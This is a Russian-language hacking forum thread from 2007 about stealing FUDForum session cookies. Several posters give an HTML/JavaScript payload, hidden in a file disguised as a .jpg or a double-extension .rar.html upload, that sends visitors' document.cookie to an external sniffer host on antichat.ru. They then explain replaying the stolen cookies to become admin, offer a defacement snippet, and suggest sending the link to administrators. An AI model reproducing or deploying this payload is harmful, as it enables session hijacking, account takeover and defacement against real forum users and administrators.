Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимость FUDForum, Ворование куков FUDForum (https://forum.antichat.xyz/showthread.php?t=32330)

HiMiC 29.01.2007 21:20

Уязвимость FUDForum, Ворование куков FUDForum
 
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим

Код HTML:

<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>

После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=get...2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:

Код HTML:

<html>
<head>
<h1>Defaced by HiMiC</h1>
</head>
</html>


_-Ramos-_ 31.01.2007 18:45

я чуть-чуть делаю на форуме по другому
сначала нахожу в инете какуюто интересную хтмл
сохраняю ее
потом вписываю в нее код
-------------------------------------------------------------------------------------
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
-------------------------------------------------------------------------------------------
сохраняю и переминовываю в тип stranica.rar(или другой формат который поддерживает форум для заливки).html
потом заливаю это на форум в любую тему
также эту ссылку кидаю админу
потом только стоит подменить куки и вы юзер , модер , админ
и делайте че хотите
способ заливки stranica.rar.html выходит на многих форумах в которых проблеми с фильтрацией
П.С. также можна таким методом залить страницу в аватары , и поставить на аватар, только потом код будет чуть-чуть другой

Zion 08.02.2007 17:24

Цитата:

Сообщение от HiMiC
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим

Код HTML:

<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>

После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=get...2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:

Код HTML:

<html>
<head>
<h1>Defaced by HiMiC</h1>
</head>
</html>


HiMiC, вообщем пробывал в картинку вставить этот код, но она почему то не открывается. Подскажи, что то может не правильно делаю? И еще вопрос, как на других форумах это проделывать ?

Thanat0z 08.02.2007 17:47

Цитата:

Сообщение от HiMiC
Можно поприкалываться и так:

Код HTML:

<html>
<head>
<h1>Defaced by HiMiC</h1>
</head>
</html>


никому такого не пожелаю, просто ужас

__http://security.nnov.ru/Jdocument612.html


Время: 15:20